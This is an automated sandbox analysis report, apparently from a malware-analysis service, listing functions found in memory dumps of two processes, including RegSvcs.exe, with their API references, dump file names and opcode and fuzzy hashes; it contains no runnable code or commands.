              • Associated: 00000004.00000002.394977155.000000000103B000.00000002.00020000.sdmp Download File
              Similarity
              • API ID: Variant$AllocClearCopyInitString
              • String ID:
              • API String ID: 2808897238-0
              • Opcode ID: 194225273662c3b7133b5f66a01c1f42fef2f06410c589f0a827d31e2831af01
              • Instruction ID: 1cf10cb3abe48f722e9971dafdc4a265541d272a3ae26612b950fe7d3f9fa534
              • Opcode Fuzzy Hash: 194225273662c3b7133b5f66a01c1f42fef2f06410c589f0a827d31e2831af01
              • Instruction Fuzzy Hash: CD51E63520020A97EB00FF29EC415AEB764FF88355F40852AFD48C7282DB39DA55D7E2
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00FA407F, Relevance: 6.1, APIs: 4, Instructions: 130COMMON
              Download Yara Rule
              APIs
              Memory Dump Source
              • Source File: 00000004.00000002.394808921.0000000000F91000.00000020.00020000.sdmp, Offset: 00F90000, based on PE: true
              • Associated: 00000004.00000002.394801893.0000000000F90000.00000002.00020000.sdmp Download File
              • Associated: 00000004.00000002.394898675.0000000001012000.00000002.00020000.sdmp Download File
              • Associated: 00000004.00000002.394918477.0000000001020000.00000004.00020000.sdmp Download File
              • Associated: 00000004.00000002.394935971.0000000001021000.00000008.00020000.sdmp Download File
              • Associated: 00000004.00000002.394948655.0000000001022000.00000004.00020000.sdmp Download File
              • Associated: 00000004.00000002.394965694.0000000001037000.00000004.00020000.sdmp Download File
              • Associated: 00000004.00000002.394977155.000000000103B000.00000002.00020000.sdmp Download File
              Similarity
              • API ID: __flsbuf__flush__getptd_noexit__write_memmove
              • String ID:
              • API String ID: 2782032738-0
              • Opcode ID: 5577a25a8bf7660d1eb98eb86be2243cf7e8e14d6244587b41df67c47af93e11
              • Instruction ID: 3fb9fc45fe69e32ffcafe4d532cc7444c43a7e61c42989844097fbe32a78ad57
              • Opcode Fuzzy Hash: 5577a25a8bf7660d1eb98eb86be2243cf7e8e14d6244587b41df67c47af93e11
              • Instruction Fuzzy Hash: 1541E4B2A007049BDB258F68CC8465EB7B5AFD2360F248528E42597680D7F0FD81FB50
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00FB075F, Relevance: 6.1, APIs: 4, Instructions: 103COMMON
              Download Yara Rule
              APIs
              • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 00FB0793
              • __isleadbyte_l.LIBCMT ref: 00FB07C6
              • MultiByteToWideChar.KERNEL32(?,00000009,?,?,00000000,00000000,?,?,?,00000000,?,00000000), ref: 00FB07F7
              • MultiByteToWideChar.KERNEL32(?,00000009,?,00000001,00000000,00000000,?,?,?,00000000,?,00000000), ref: 00FB0865
              Memory Dump Source
              • Source File: 00000004.00000002.394808921.0000000000F91000.00000020.00020000.sdmp, Offset: 00F90000, based on PE: true
              • Associated: 00000004.00000002.394801893.0000000000F90000.00000002.00020000.sdmp Download File
              • Associated: 00000004.00000002.394898675.0000000001012000.00000002.00020000.sdmp Download File
              • Associated: 00000004.00000002.394918477.0000000001020000.00000004.00020000.sdmp Download File
              • Associated: 00000004.00000002.394935971.0000000001021000.00000008.00020000.sdmp Download File
              • Associated: 00000004.00000002.394948655.0000000001022000.00000004.00020000.sdmp Download File
              • Associated: 00000004.00000002.394965694.0000000001037000.00000004.00020000.sdmp Download File
              • Associated: 00000004.00000002.394977155.000000000103B000.00000002.00020000.sdmp Download File
              Similarity
              • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
              • String ID:
              • API String ID: 3058430110-0
              • Opcode ID: 0fa5b473cd8e1c3bed851581875251f51682cc9c1a5a05844c965d0984e58e12
              • Instruction ID: c51e5051e9b1bb48ba07fb71928b5ef5184c7184717a6a5b7892eb4e80c0e0cd
              • Opcode Fuzzy Hash: 0fa5b473cd8e1c3bed851581875251f51682cc9c1a5a05844c965d0984e58e12
              • Instruction Fuzzy Hash: AE316271A00246EFDB20DF66C884EEB7BA5BF01320B298569E4659B191DF30ED50EF90
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00F9E2C0, Relevance: 6.1, APIs: 4, Instructions: 82windowCOMMON
              Download Yara Rule
              APIs
              • _memset.LIBCMT ref: 00F9E2E2
              • Shell_NotifyIconW.SHELL32(00000000,?), ref: 00F9E3A7
              Memory Dump Source
              • Source File: 00000004.00000002.394808921.0000000000F91000.00000020.00020000.sdmp, Offset: 00F90000, based on PE: true
              • Associated: 00000004.00000002.394801893.0000000000F90000.00000002.00020000.sdmp Download File
              • Associated: 00000004.00000002.394898675.0000000001012000.00000002.00020000.sdmp Download File
              • Associated: 00000004.00000002.394918477.0000000001020000.00000004.00020000.sdmp Download File
              • Associated: 00000004.00000002.394935971.0000000001021000.00000008.00020000.sdmp Download File
              • Associated: 00000004.00000002.394948655.0000000001022000.00000004.00020000.sdmp Download File
              • Associated: 00000004.00000002.394965694.0000000001037000.00000004.00020000.sdmp Download File
              • Associated: 00000004.00000002.394977155.000000000103B000.00000002.00020000.sdmp Download File
              Similarity
              • API ID: IconNotifyShell__memset
              • String ID:
              • API String ID: 928536360-0
              • Opcode ID: 276bd6b3151a5cea3c82d62f313e53ff3f734da22035ba30f3e0af3596d7c7ad
              • Instruction ID: 06ef0f190ec6a61830d63d208f1b5721b779c68e5fe1467abefeec265b4aa45e
              • Opcode Fuzzy Hash: 276bd6b3151a5cea3c82d62f313e53ff3f734da22035ba30f3e0af3596d7c7ad
              • Instruction Fuzzy Hash: 03316DB0A08701DFE730DF25D855BA7BBE8BB89314F10481DE5DA87280E779A948DF52
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00FC494A, Relevance: 6.0, APIs: 4, Instructions: 46COMMON
              Download Yara Rule
              APIs
              Memory Dump Source
              • Source File: 00000004.00000002.394808921.0000000000F91000.00000020.00020000.sdmp, Offset: 00F90000, based on PE: true
              • Associated: 00000004.00000002.394801893.0000000000F90000.00000002.00020000.sdmp Download File
              • Associated: 00000004.00000002.394898675.0000000001012000.00000002.00020000.sdmp Download File
              • Associated: 00000004.00000002.394918477.0000000001020000.00000004.00020000.sdmp Download File
              • Associated: 00000004.00000002.394935971.0000000001021000.00000008.00020000.sdmp Download File
              • Associated: 00000004.00000002.394948655.0000000001022000.00000004.00020000.sdmp Download File
              • Associated: 00000004.00000002.394965694.0000000001037000.00000004.00020000.sdmp Download File
              • Associated: 00000004.00000002.394977155.000000000103B000.00000002.00020000.sdmp Download File
              Similarity
              • API ID: _wcslen$_malloc_wcscat_wcscpy
              • String ID:
              • API String ID: 1597257046-0
              • Opcode ID: a1c3ae6c9997c0947b0532ca0a8def678c33ab289375e4fac9b3715e8b71323c
              • Instruction ID: 5406082521b92dc26c5bff8efc3ba478f197c54001791ca6c923f6c286ebbf98
              • Opcode Fuzzy Hash: a1c3ae6c9997c0947b0532ca0a8def678c33ab289375e4fac9b3715e8b71323c
              • Instruction Fuzzy Hash: 3D0162712002406FC314EB69C886D27B3ADFB8A360F01C52DF95587641DA39FC40D760
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00F9F570, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 68COMMON
              Download Yara Rule
              APIs
              Strings
              Memory Dump Source
              • Source File: 00000004.00000002.394808921.0000000000F91000.00000020.00020000.sdmp, Offset: 00F90000, based on PE: true
              • Associated: 00000004.00000002.394801893.0000000000F90000.00000002.00020000.sdmp Download File
              • Associated: 00000004.00000002.394898675.0000000001012000.00000002.00020000.sdmp Download File
              • Associated: 00000004.00000002.394918477.0000000001020000.00000004.00020000.sdmp Download File
              • Associated: 00000004.00000002.394935971.0000000001021000.00000008.00020000.sdmp Download File
              • Associated: 00000004.00000002.394948655.0000000001022000.00000004.00020000.sdmp Download File
              • Associated: 00000004.00000002.394965694.0000000001037000.00000004.00020000.sdmp Download File
              • Associated: 00000004.00000002.394977155.000000000103B000.00000002.00020000.sdmp Download File
              Similarity
              • API ID: _memmove
              • String ID: ?T
              • API String ID: 4104443479-3504941901
              • Opcode ID: 6ed6293c3fc55fbf7b4a0a22f5e05766082ab94377e9ba98b933d083143e9cd3
              • Instruction ID: d24a30b32da73f60ad5cf2a8675d4e09962d2f6237922d0a4a32734a7483bf39
              • Opcode Fuzzy Hash: 6ed6293c3fc55fbf7b4a0a22f5e05766082ab94377e9ba98b933d083143e9cd3
              • Instruction Fuzzy Hash: 171181B2510119AFDB04DFA5ECC0DAE73A8AB04344B544569EA06C7601EB35FA19EBD0
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00FDCDB9, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 54COMMON
              Download Yara Rule
              APIs
              • SafeArrayCreateVector.OLEAUT32(00000013,00000000), ref: 00FDCDEE
              • _memmove.LIBCMT ref: 00FDCE15
              Strings
              Memory Dump Source
              • Source File: 00000004.00000002.394808921.0000000000F91000.00000020.00020000.sdmp, Offset: 00F90000, based on PE: true
              • Associated: 00000004.00000002.394801893.0000000000F90000.00000002.00020000.sdmp Download File
              • Associated: 00000004.00000002.394898675.0000000001012000.00000002.00020000.sdmp Download File
              • Associated: 00000004.00000002.394918477.0000000001020000.00000004.00020000.sdmp Download File
              • Associated: 00000004.00000002.394935971.0000000001021000.00000008.00020000.sdmp Download File
              • Associated: 00000004.00000002.394948655.0000000001022000.00000004.00020000.sdmp Download File
              • Associated: 00000004.00000002.394965694.0000000001037000.00000004.00020000.sdmp Download File
              • Associated: 00000004.00000002.394977155.000000000103B000.00000002.00020000.sdmp Download File
              Similarity
              • API ID: ArrayCreateSafeVector_memmove
              • String ID: crts
              • API String ID: 564309351-3724388283
              • Opcode ID: 31cc7971de2d4f4e6d02f12901a381c028071701600bf037f6d06b3f7407d127
              • Instruction ID: 986dfbd52aef33eac3c2ba734ad686f7a2ec902af79c8592b6870cf8d8e96a68
              • Opcode Fuzzy Hash: 31cc7971de2d4f4e6d02f12901a381c028071701600bf037f6d06b3f7407d127
              • Instruction Fuzzy Hash: 4801C0B7900109ABD710DF99EC45E9A77A8EB44310F50412AFE08D7201DB35EA56D7E0
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00FC2175, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 50COMMON
              Download Yara Rule
              APIs
              Strings
              Memory Dump Source
              • Source File: 00000004.00000002.394808921.0000000000F91000.00000020.00020000.sdmp, Offset: 00F90000, based on PE: true
              • Associated: 00000004.00000002.394801893.0000000000F90000.00000002.00020000.sdmp Download File
              • Associated: 00000004.00000002.394898675.0000000001012000.00000002.00020000.sdmp Download File
              • Associated: 00000004.00000002.394918477.0000000001020000.00000004.00020000.sdmp Download File
              • Associated: 00000004.00000002.394935971.0000000001021000.00000008.00020000.sdmp Download File
              • Associated: 00000004.00000002.394948655.0000000001022000.00000004.00020000.sdmp Download File
              • Associated: 00000004.00000002.394965694.0000000001037000.00000004.00020000.sdmp Download File
              • Associated: 00000004.00000002.394977155.000000000103B000.00000002.00020000.sdmp Download File
              Similarity
              • API ID: __fread_nolock_memmove
              • String ID: EA06
              • API String ID: 1988441806-3962188686
              • Opcode ID: 7443b5bfa04fb44f8613f5c7eb0b9c3b5876c47ad998e5f31f7c91d6583d74c8
              • Instruction ID: 858e54cea8bfd16b69ca0fc77be26c5a24801dfcab325e01dcb812e5d59ef18a
              • Opcode Fuzzy Hash: 7443b5bfa04fb44f8613f5c7eb0b9c3b5876c47ad998e5f31f7c91d6583d74c8
              • Instruction Fuzzy Hash: 61014972D042187BCB18DBA88C16FEEBBF89F45301F04859EF59692281D978A718D7A0
              Uniqueness

              Uniqueness Score: -1.00%

              Analysis Process: RegSvcs.exe PID: 4644 Parent PID: 3836 RegSvcs.exeCOMMON

              Executed Functions

              Function 0722280F, Relevance: 2.6, Strings: 2, Instructions: 63COMMON
              Download Yara Rule
              Strings
              Memory Dump Source
              • Source File: 00000005.00000002.576787909.0000000007220000.00000040.00000001.sdmp, Offset: 07220000, based on PE: false
              Similarity
              • API ID:
              • String ID: [1$c,
              • API String ID: 0-3722584227
              • Opcode ID: eb2ae5667b90224bb4d14db6c279317cfe98d5c036370447115416019c90e804
              • Instruction ID: 0e14d16545c72e6effeb5273060b5146fd03a7338318f780c64ceedcda038c9e
              • Opcode Fuzzy Hash: eb2ae5667b90224bb4d14db6c279317cfe98d5c036370447115416019c90e804
              • Instruction Fuzzy Hash: 392125B4610752EFC3A4EF74E14845AB7E2FB892143108E2CC95A9BB54DB35ED0ACF80
              Uniqueness

              Uniqueness Score: -1.00%

              Function 01F993E8, Relevance: 1.7, APIs: 1, Instructions: 194COMMON
              Download Yara Rule
              APIs
              • GetModuleHandleW.KERNELBASE(00000000), ref: 01F9962E
              Memory Dump Source
              • Source File: 00000005.00000002.569964260.0000000001F90000.00000040.00000001.sdmp, Offset: 01F90000, based on PE: false
              Similarity
              • API ID: HandleModule
              • String ID:
              • API String ID: 4139908857-0
              • Opcode ID: e8a6788444e2b3dc66e21c1a5a211af0a1567c3139fe2e28daac8f4a913a9155
              • Instruction ID: cc29481304962a06ebef34e1b2b110a5521867b9f29d8a8233fcb7c6a2f76eff
              • Opcode Fuzzy Hash: e8a6788444e2b3dc66e21c1a5a211af0a1567c3139fe2e28daac8f4a913a9155
              • Instruction Fuzzy Hash: 157146B0A00B058FEB24EF69D44479ABBF5FF88218F008A2DD586D7A40DB75E845CB91
              Uniqueness

              Uniqueness Score: -1.00%

              Function 01F9FB98, Relevance: 1.6, APIs: 1, Instructions: 144COMMON
              Download Yara Rule
              APIs
              • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 01F9FD0A
              Memory Dump Source
              • Source File: 00000005.00000002.569964260.0000000001F90000.00000040.00000001.sdmp, Offset: 01F90000, based on PE: false
              Similarity
              • API ID: CreateWindow
              • String ID:
              • API String ID: 716092398-0
              • Opcode ID: c768485fa6705c215e06ca57025639b2db7db775183646f3e414b174d5bfd53e
              • Instruction ID: 924f488de8254443dbec15c04fbde6a742c54c73f348989e896d80272e7495c5
              • Opcode Fuzzy Hash: c768485fa6705c215e06ca57025639b2db7db775183646f3e414b174d5bfd53e
              • Instruction Fuzzy Hash: AC5101B1C04249EFDF01CFA9C880ADDBFB1BF48314F18816AE918AB221D7359955CF90
              Uniqueness

              Uniqueness Score: -1.00%

              Function 01F9FB61, Relevance: 1.6, APIs: 1, Instructions: 134COMMON
              Download Yara Rule
              APIs
              • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 01F9FD0A
              Memory Dump Source
              • Source File: 00000005.00000002.569964260.0000000001F90000.00000040.00000001.sdmp, Offset: 01F90000, based on PE: false
              Similarity
              • API ID: CreateWindow
              • String ID:
              • API String ID: 716092398-0
              • Opcode ID: f0c4af963c1a1df7049649e8a5b1d510521ee794cd633925c3ff4f5b9e630020
              • Instruction ID: 77bb5714f45d608d203b5d22d3b8c0caa5d1c11b1e049592544bcd59745fc4d3
              • Opcode Fuzzy Hash: f0c4af963c1a1df7049649e8a5b1d510521ee794cd633925c3ff4f5b9e630020
              • Instruction Fuzzy Hash: BF51EFB2D00209DFEF14CFA9C884ADDBFB5BF48314F28852AE815AB210D775A945CF91
              Uniqueness

              Uniqueness Score: -1.00%

              Function 01F9DA04, Relevance: 1.6, APIs: 1, Instructions: 116COMMON
              Download Yara Rule
              APIs
              • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 01F9FD0A
              Memory Dump Source
              • Source File: 00000005.00000002.569964260.0000000001F90000.00000040.00000001.sdmp, Offset: 01F90000, based on PE: false
              Similarity
              • API ID: CreateWindow
              • String ID:
              • API String ID: 716092398-0
              • Opcode ID: b26bdd7d73ec695b335085d8fb1bd97ed5f17298f500a3c7fc3220c99aa6f75f
              • Instruction ID: d6741ce17ff2e21baf11fb8e3be577d0ce32aa9d87af913b3795bc9f3ac50356
              • Opcode Fuzzy Hash: b26bdd7d73ec695b335085d8fb1bd97ed5f17298f500a3c7fc3220c99aa6f75f
              • Instruction Fuzzy Hash: AA519FB1D00209DFDF14DF99C884ADEBFB5BF88314F24852AE819AB210D7759945CF91
              Uniqueness

              Uniqueness Score: -1.00%

              Function 01F9A14C, Relevance: 1.6, APIs: 1, Instructions: 65COMMON
              Download Yara Rule
              APIs
              • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,01F9BCC6,?,?,?,?,?), ref: 01F9BD87
              Memory Dump Source
              • Source File: 00000005.00000002.569964260.0000000001F90000.00000040.00000001.sdmp, Offset: 01F90000, based on PE: false
              Similarity
              • API ID: DuplicateHandle
              • String ID:
              • API String ID: 3793708945-0
              • Opcode ID: 8ea8e204d820b6e883e94999e227c03d8e1fd8221677845e0b44ee261247419e
              • Instruction ID: 7b62c465804a5ee200e01f70ba1d89640e6e672ca6aa5487bb988e0ede67ef3a
              • Opcode Fuzzy Hash: 8ea8e204d820b6e883e94999e227c03d8e1fd8221677845e0b44ee261247419e
              • Instruction Fuzzy Hash: 4221E5B5900209DFDF10CF99D484ADEBBF8EB48324F14841AE954A3310D375A954CFA1
              Uniqueness

              Uniqueness Score: -1.00%

              Function 01F9BCF9, Relevance: 1.6, APIs: 1, Instructions: 64COMMON
              Download Yara Rule
              APIs
              • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,01F9BCC6,?,?,?,?,?), ref: 01F9BD87
              Memory Dump Source
              • Source File: 00000005.00000002.569964260.0000000001F90000.00000040.00000001.sdmp, Offset: 01F90000, based on PE: false
              Similarity
              • API ID: DuplicateHandle
              • String ID:
              • API String ID: 3793708945-0
              • Opcode ID: c725e1ce0d2cb1d15135cba95921816cb3525eba6a47c6666ceb3f73362984bc
              • Instruction ID: c21832a731ed3e026046aeeab0633e87358ffe81cea5584311e982d74ba04fe1
              • Opcode Fuzzy Hash: c725e1ce0d2cb1d15135cba95921816cb3525eba6a47c6666ceb3f73362984bc
              • Instruction Fuzzy Hash: 1021B3B59002199FDB10CFAAD884ADEBFF8EB48324F14841AE954A3350D379A954CFA1
              Uniqueness

              Uniqueness Score: -1.00%

              Function 01F98768, Relevance: 1.6, APIs: 1, Instructions: 55libraryCOMMON
              Download Yara Rule
              APIs
              • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,01F996A9,00000800,00000000,00000000), ref: 01F998BA
              Memory Dump Source
              • Source File: 00000005.00000002.569964260.0000000001F90000.00000040.00000001.sdmp, Offset: 01F90000, based on PE: false
              Similarity
              • API ID: LibraryLoad
              • String ID:
              • API String ID: 1029625771-0
              • Opcode ID: 35dc722ac223960ae2cdffd7f80c408ac78e2c86b31087e85093ebebbfd8339b
              • Instruction ID: c6218e1cc39c71e57a73a5548053ec9efa4d735414b4305729ea0267efbda942
              • Opcode Fuzzy Hash: 35dc722ac223960ae2cdffd7f80c408ac78e2c86b31087e85093ebebbfd8339b
              • Instruction Fuzzy Hash: 2811C4B6D00209DBDB10DF9AC444ADEBBF4FB88314F55842ED515A7600C375A945CFA5
              Uniqueness

              Uniqueness Score: -1.00%

              Function 01F99849, Relevance: 1.6, APIs: 1, Instructions: 54libraryCOMMON
              Download Yara Rule
              APIs
              • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,01F996A9,00000800,00000000,00000000), ref: 01F998BA
              Memory Dump Source
              • Source File: 00000005.00000002.569964260.0000000001F90000.00000040.00000001.sdmp, Offset: 01F90000, based on PE: false
              Similarity
              • API ID: LibraryLoad
              • String ID:
              • API String ID: 1029625771-0
              • Opcode ID: 52a253f8eac573ae96c68b5165fa35eeef12c6cbf0ed98f60af18d15d6a1bd82
              • Instruction ID: 4beb81a95676e17a718f61b3a041146d3eb2d4634b60dfc38b0e819c2ae9fa48
              • Opcode Fuzzy Hash: 52a253f8eac573ae96c68b5165fa35eeef12c6cbf0ed98f60af18d15d6a1bd82
              • Instruction Fuzzy Hash: F711D3B6D00209DFDB10CF9AC448ADEBBF8EB88324F54842ED515A7600C379A945CFA5
              Uniqueness

              Uniqueness Score: -1.00%

              Function 01F995C8, Relevance: 1.5, APIs: 1, Instructions: 47COMMON
              Download Yara Rule
              APIs
              • GetModuleHandleW.KERNELBASE(00000000), ref: 01F9962E
              Memory Dump Source
              • Source File: 00000005.00000002.569964260.0000000001F90000.00000040.00000001.sdmp, Offset: 01F90000, based on PE: false
              Similarity
              • API ID: HandleModule
              • String ID:
              • API String ID: 4139908857-0
              • Opcode ID: 69cd1d9e016803856753ab8a465d6591e51ed0472a1095b4638ca6c3dc218f6e
              • Instruction ID: 526a75a0a2131843eaa396783ec5a6059cdb59e7ebff12544e54dbbe3c7aa02e
              • Opcode Fuzzy Hash: 69cd1d9e016803856753ab8a465d6591e51ed0472a1095b4638ca6c3dc218f6e
              • Instruction Fuzzy Hash: 2011DFB6C006498FDB20DF9AC444ADEFBF8EB88328F15842ED519A7600C375A545CFA1
              Uniqueness

              Uniqueness Score: -1.00%

              Function 01F9DA3C, Relevance: 1.5, APIs: 1, Instructions: 47COMMON
              Download Yara Rule
              APIs
              • SetWindowLongW.USER32(?,?,?,?,?,?,?,?,01F9FE28,?,?,?,?), ref: 01F9FE9D
              Memory Dump Source
              • Source File: 00000005.00000002.569964260.0000000001F90000.00000040.00000001.sdmp, Offset: 01F90000, based on PE: false
              Similarity
              • API ID: LongWindow
              • String ID:
              • API String ID: 1378638983-0
              • Opcode ID: 213fad72692549200d0a5d9bdea9df713bbb509725cb6d75be9eaa42329db84f
              • Instruction ID: 4d3771eb5e9a6fccc25c92109aeb8c74acb7e116b2cb5c4dee5b9dcbb51f18d0
              • Opcode Fuzzy Hash: 213fad72692549200d0a5d9bdea9df713bbb509725cb6d75be9eaa42329db84f
              • Instruction Fuzzy Hash: CF1122B58002098FDB10DF8AC489BDEBBF8EB88724F14841AE915A3301C374A944CFA1
              Uniqueness

              Uniqueness Score: -1.00%

              Function 01F9FE38, Relevance: 1.5, APIs: 1, Instructions: 46COMMON
              Download Yara Rule
              APIs
              • SetWindowLongW.USER32(?,?,?,?,?,?,?,?,01F9FE28,?,?,?,?), ref: 01F9FE9D
              Memory Dump Source
              • Source File: 00000005.00000002.569964260.0000000001F90000.00000040.00000001.sdmp, Offset: 01F90000, based on PE: false
              Similarity
              • API ID: LongWindow
              • String ID:
              • API String ID: 1378638983-0
              • Opcode ID: d7241b2d574af84eecf0eb7a6be6e8ed668fbb040a949083d7decdcd76ed19fe
              • Instruction ID: ae1bd4596dc960c45d50976cb7226d942e32a74402939e626d53be291c754660
              • Opcode Fuzzy Hash: d7241b2d574af84eecf0eb7a6be6e8ed668fbb040a949083d7decdcd76ed19fe
              • Instruction Fuzzy Hash: 0B1103B5800209DFDB10DF9AD489BDEBBF8EB48724F14841AD955B3341C374A944CFA1
              Uniqueness

              Uniqueness Score: -1.00%

              Function 07223382, Relevance: 1.3, Strings: 1, Instructions: 94COMMON
              Download Yara Rule
              Strings
              Memory Dump Source
              • Source File: 00000005.00000002.576787909.0000000007220000.00000040.00000001.sdmp, Offset: 07220000, based on PE: false
              Similarity
              • API ID:
              • String ID: #)
              • API String ID: 0-405437329
              • Opcode ID: 13f504ea1726acd940ccb3fd09235339521755bc097c0e254c2e9f106709bdc7
              • Instruction ID: 3e9832e6bac3897ca05322125d051785b84dda81cd175b33f62f6a5b025252f2
              • Opcode Fuzzy Hash: 13f504ea1726acd940ccb3fd09235339521755bc097c0e254c2e9f106709bdc7
              • Instruction Fuzzy Hash: A931C1702053859FC315EBB090906AEB7E7AFC1218B598C2DC1468F749EF71FC0997A1
              Uniqueness

              Uniqueness Score: -1.00%

              Function 07221270, Relevance: 1.3, Strings: 1, Instructions: 93COMMON
              Download Yara Rule
              Strings
              Memory Dump Source
              • Source File: 00000005.00000002.576787909.0000000007220000.00000040.00000001.sdmp, Offset: 07220000, based on PE: false
              Similarity
              • API ID:
              • String ID: h?Ll
              • API String ID: 0-3895037735
              • Opcode ID: 311dc8d8cd6d9d94ed24774fbdd739921357958970bc3a2b57b266213e571f50
              • Instruction ID: 123557813a224bfc44b0fb911ab78432b8a74783c5951afd6f1c125c34f04c05
              • Opcode Fuzzy Hash: 311dc8d8cd6d9d94ed24774fbdd739921357958970bc3a2b57b266213e571f50
              • Instruction Fuzzy Hash: 5A212871B14125DFC715DB6CD880DAABBB5EF8932471181AAE418CB762C770EC06CB91
              Uniqueness

              Uniqueness Score: -1.00%

              Function 07223072, Relevance: 1.3, Strings: 1, Instructions: 47COMMON
              Download Yara Rule
              Strings
              Memory Dump Source
              • Source File: 00000005.00000002.576787909.0000000007220000.00000040.00000001.sdmp, Offset: 07220000, based on PE: false
              Similarity
              • API ID:
              • String ID:
              • API String ID: 0-3916222277
              • Opcode ID: 9fbff9eac78b443c3f84806fb9fa54f35853dadb28afd5a5070c74eabadf44a1
              • Instruction ID: 26d1a1681448a97173d2f9be3e3b1189e74dee59e2ae8b807f72e8947b8a0c5e
              • Opcode Fuzzy Hash: 9fbff9eac78b443c3f84806fb9fa54f35853dadb28afd5a5070c74eabadf44a1
              • Instruction Fuzzy Hash: D601D671729350AFD711AB78A81C9AB7BDBDB89210705447AE907C7702D935CC058BA1
              Uniqueness

              Uniqueness Score: -1.00%

              Function 07223AC0, Relevance: 1.3, Strings: 1, Instructions: 33COMMON
              Download Yara Rule
              Strings
              Memory Dump Source
              • Source File: 00000005.00000002.576787909.0000000007220000.00000040.00000001.sdmp, Offset: 07220000, based on PE: false
              Similarity
              • API ID:
              • String ID: s
              • API String ID: 0-3679297121
              • Opcode ID: ee39cda943c9ea2c9c42da3ec9ee0b406b02fb91c36698d42af4c9e0e671786b
              • Instruction ID: 175b3c899aa6311ce1e73600837e0828a819a540e4284e5058625e9521771683
              • Opcode Fuzzy Hash: ee39cda943c9ea2c9c42da3ec9ee0b406b02fb91c36698d42af4c9e0e671786b
              • Instruction Fuzzy Hash: 8BF027322392A17F8312D699941089ABBA9DFC351030048BEE006CF742DEA5ED06C7E0
              Uniqueness

              Uniqueness Score: -1.00%

              Function 07223AD0, Relevance: 1.3, Strings: 1, Instructions: 26COMMON
              Download Yara Rule
              Strings
              Memory Dump Source
              • Source File: 00000005.00000002.576787909.0000000007220000.00000040.00000001.sdmp, Offset: 07220000, based on PE: false
              Similarity
              • API ID:
              • String ID: s
              • API String ID: 0-3679297121
              • Opcode ID: af2794f3ab9f13d5c2ef840b509112914e1cb4a08cff70e534cb225fef089cb2
              • Instruction ID: 9129812a29c215b7f27ebb633948549de1af6eda826f885a3d1ce73ca023168a
              • Opcode Fuzzy Hash: af2794f3ab9f13d5c2ef840b509112914e1cb4a08cff70e534cb225fef089cb2
              • Instruction Fuzzy Hash: 23E0DF71334522BB4650E69994118AAB3AAEBC6A24300883ED40ACB742DEA6EC0387D0
              Uniqueness

              Uniqueness Score: -1.00%

              Function 07220040, Relevance: .7, Instructions: 673COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000005.00000002.576787909.0000000007220000.00000040.00000001.sdmp, Offset: 07220000, based on PE: false
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 8a34e77053b4c4cc9b7268c80fea4bcb38cbd1587ce42dd7eb357eff699b2c83
              • Instruction ID: ac749c85fb1031cf032bb15dd45dd634d1018c77787e98d5536ecc3420126afc
              • Opcode Fuzzy Hash: 8a34e77053b4c4cc9b7268c80fea4bcb38cbd1587ce42dd7eb357eff699b2c83
              • Instruction Fuzzy Hash: CC529DB1A1061ADFCB24CF58C484AAEBBF6FF88310F148969D416AB655D730F942CF90
              Uniqueness

              Uniqueness Score: -1.00%

              Function 07223CF8, Relevance: .2, Instructions: 245COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000005.00000002.576787909.0000000007220000.00000040.00000001.sdmp, Offset: 07220000, based on PE: false
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 9a9659d624e4f7a6b9f962409d4e0d775557b05be2661cf0b9543c5924627e65
              • Instruction ID: 0b2ca76e5b77c984ead82b1c92b44a52d1c2578e94cb8044d95dd75ca572deb6
              • Opcode Fuzzy Hash: 9a9659d624e4f7a6b9f962409d4e0d775557b05be2661cf0b9543c5924627e65
              • Instruction Fuzzy Hash: 0691E8B0A24226EFCF24CF59D484AAEBBF5FF88310F14851AE405D7262D778E846DB51
              Uniqueness

              Uniqueness Score: -1.00%

              Function 07224370, Relevance: .2, Instructions: 190COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000005.00000002.576787909.0000000007220000.00000040.00000001.sdmp, Offset: 07220000, based on PE: false
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 049c897ac6eb41cab14305546dccacf5d03ebee2064b7e414b34f124cba42ec2
              • Instruction ID: 8bcef6d185e97657894cc093448872ed8f4b7257cd9d1faa3fd00ef8c4483378
              • Opcode Fuzzy Hash: 049c897ac6eb41cab14305546dccacf5d03ebee2064b7e414b34f124cba42ec2
              • Instruction Fuzzy Hash: 6171BEB0A20256EFD724EF64C494BAAB7F2BF88314F108559D856AB350CBB1EC42DF40
              Uniqueness

              Uniqueness Score: -1.00%

              Function 07220844, Relevance: .1, Instructions: 131COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000005.00000002.576787909.0000000007220000.00000040.00000001.sdmp, Offset: 07220000, based on PE: false
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 0fa9e550be2859ddcd9c8016445547444c4328fda5c1c8e906caecd051932ce0
              • Instruction ID: 59c2563d672c587c8bcab6bdd321ddb7cba1e2a60699933571a1a16aecb67272
              • Opcode Fuzzy Hash: 0fa9e550be2859ddcd9c8016445547444c4328fda5c1c8e906caecd051932ce0
              • Instruction Fuzzy Hash: 655135B0D10229DFDB24CFA9C444BDEBBF5AF48714F148019E816AB351C774A945CF91
              Uniqueness

              Uniqueness Score: -1.00%

